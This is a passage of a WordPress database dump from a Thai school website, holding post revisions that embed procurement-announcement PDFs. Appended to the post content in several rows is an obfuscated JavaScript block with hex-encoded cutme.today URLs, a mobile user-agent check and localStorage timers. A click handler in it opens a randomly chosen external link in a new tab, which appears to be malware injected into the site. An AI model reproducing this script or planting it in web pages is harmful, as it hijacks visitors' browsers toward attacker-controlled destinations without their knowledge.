HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-23 14:35:07','2024-08-23 07:35:07','',871,'http://pakhaeng.ssk.in.th/?p=1066',0,'revision','',0),
(1068,1,'2024-08-23 14:39:09','2024-08-23 07:39:09','<!-- wp:file {\"id\":1060,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา\"></object><a id=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1061,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง\"></object><a id=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1062,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\",\"displayPreview\":true,\"backgroundColor\":\"white\"} -->\n<div class=\"wp-block-file has-white-background-color has-background\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศผู้ชนะการเสนอราคา จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น\"></object><a id=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศผู้ชนะการเสนอราคา จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','closed','closed','','1059-revision-v1','','','2024-08-23 14:39:09','2024-08-23 07:39:09','',1059,'http://pakhaeng.ssk.in.th/?p=1068',0,'revision','',0),
(1069,1,'2024-08-23 14:39:10','2024-08-23 07:39:10','<!-- wp:file {\"id\":1060,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา\"></object><a id=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1061,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง\"></object><a id=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1062,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\",\"displayPreview\":true,\"backgroundColor\":\"white\"} -->\n<div class=\"wp-block-file has-white-background-color has-background\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศผู้ชนะการเสนอราคา 